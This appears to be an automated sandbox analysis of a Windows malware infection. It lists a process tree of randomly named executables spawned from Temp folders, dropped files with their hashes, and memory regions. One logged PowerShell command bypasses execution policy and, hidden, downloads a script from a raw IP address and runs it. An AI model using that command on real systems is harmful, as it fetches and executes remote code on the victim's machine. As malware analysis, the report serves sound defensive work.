"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3860 -childID 2 -isForBrowser -prefsHandle 3916 -prefMapHandle 3912 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {126f1331-6857-434e-8479-8268beb7cd40} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4688 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4660 -prefMapHandle 4680 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5612e1bc-18af-40e5-9eed-f1310f5806d1} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" utility

C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe

"C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5248 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3950ba0-39ce-44ba-b6ea-5a025ad51a17} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4388 -childID 4 -isForBrowser -prefsHandle 5164 -prefMapHandle 5260 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4e1e00e-06e6-4fc0-a4e5-65aa0706e0f7} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5532 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6a37b2c-4e4b-4551-845a-73f50c1d5581} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe

"C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe"

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6120 -ip 6120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 800

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4484 -ip 4484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 808

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\96B8.tmp\96B9.tmp\96BA.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

Network

Files


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

MD5 5b76cbbb82694edd0c611cb130987872
SHA1 449401ec72a2c40dfb35acade29fbfe417de8836
SHA256 fa7bc0dcf96d0524bf2bfceef05f5682f03a10d46c0396e1325b6617906772c3
SHA512 a3925cabb6ec4eddbd28e4b9a555eb3f917f7bb2a29b96456fcc26e4d1dde91f007972f39b2be501798207c87b045b5f94fb87eedde6fa78efd06edd78ac0e7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

MD5 7924cb8c38f57af46e40d74243debe63
SHA1 e3115390802c80932f72ad5ec5aa0004e7ea6acb
SHA256 814e996603ebcf8c3b75d8a9ac93e0fa19a129bbb02d0543e282d4f98d7e39f2
SHA512 a1989892402c56e08850f0e94aeb0e41ef9a8a550ff2b7746d005887c177793306bbc8ef895f3f948003e003d90d22adae51838dd6f73f60190880a6a674bc8a

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin

MD5 489eac1766c04d398cefd0d26551a988
SHA1 81f3add4214ab19bcca6cc66063682dedf2bf596
SHA256 c7f624ae5781b3a9d4cb566e3ec9504e3520aa5e77a3e1e5a925a2771fbf9ccd
SHA512 86d1db56219b650c91cf859865fb439bf83141e89dc74d5cfcaa36dc94f10f9e82d1622020689d44aff5a93c490dc55abbd6556d9f6aa092ff7354ac30a1bb81

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

MD5 e748e0c8994ad8b0da72973ed0291bd4
SHA1 216606ad1fb1382c589163c31f2793b889f6685d
SHA256 ac9897ceda6ef3dab4410e679086c20e6a744ce43a97fcd7d921ef8e93c7f14d
SHA512 a2d4fff3f119db9dd63f4f19b62b489ed98f20c56567271347f78c802a827d6d58696aee7dce569f1d658383f8ac5b40df3bcd7ec1869193b08144085e639f2a

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2020-979-0x00000000003D0000-0x0000000000871000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

memory/4276-1000-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/3820-1001-0x00000000007B0000-0x0000000000E9E000-memory.dmp

C:\ProgramData\CC69A22766873E3E.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cert9.db

MD5 f7c6e562ad967ed884393886a94e363f
SHA1 4014007970d8138267462fd8ee069e1b3aebdbaa
SHA256 859d0087d4fdcee697c65a7885be015707bf5f20f00969cc865f805f9defc674
SHA512 6dc896fe7144910ca8d9b212a35e6690d920d85a89400c0d77dc2b9f9d6afbaaeaf7310c06d778aeac41cf351b7eaf1b4c96151469aed6b73825681e7f85eb22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js

MD5 95272a816555295eb83ffb964ec1f8f5
SHA1 1dbbe86abf4894260c9fd88ed04edbdd94c9fa61
SHA256 e627c2bc12577e1e0ffb6843bf7a865b8e143dd13d3d1a8b90b41da474e90588
SHA512 b36a6dce8999b5c7e67750299b964e2e6d6c8af3326d203244933ecf1fc28b78b0e6de7adae0e82275ad4f6d334522c17046dda7a24fc976860dd0a07cf9a7c9

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/6120-1051-0x0000000000F40000-0x0000000000FA0000-memory.dmp

memory/2504-1055-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2504-1053-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2020-1057-0x00000000003D0000-0x0000000000871000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2104-1075-0x000001F80FF10000-0x000001F80FF22000-memory.dmp

memory/2104-1076-0x000001F8102B0000-0x000001F8102C0000-memory.dmp

memory/4276-1079-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/4484-1098-0x0000000000340000-0x00000000003B0000-memory.dmp

memory/4556-1100-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/628-1105-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1103-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1107-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1109-0x0000000003860000-0x0000000003865000-memory.dmp

memory/628-1108-0x0000000003860000-0x0000000003865000-memory.dmp

memory/4276-1113-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/4488-1127-0x0000000000BC0000-0x000000000105B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/4488-1147-0x0000000000BC0000-0x000000000105B000-memory.dmp

memory/2676-1153-0x0000015279F40000-0x0000015279F62000-memory.dmp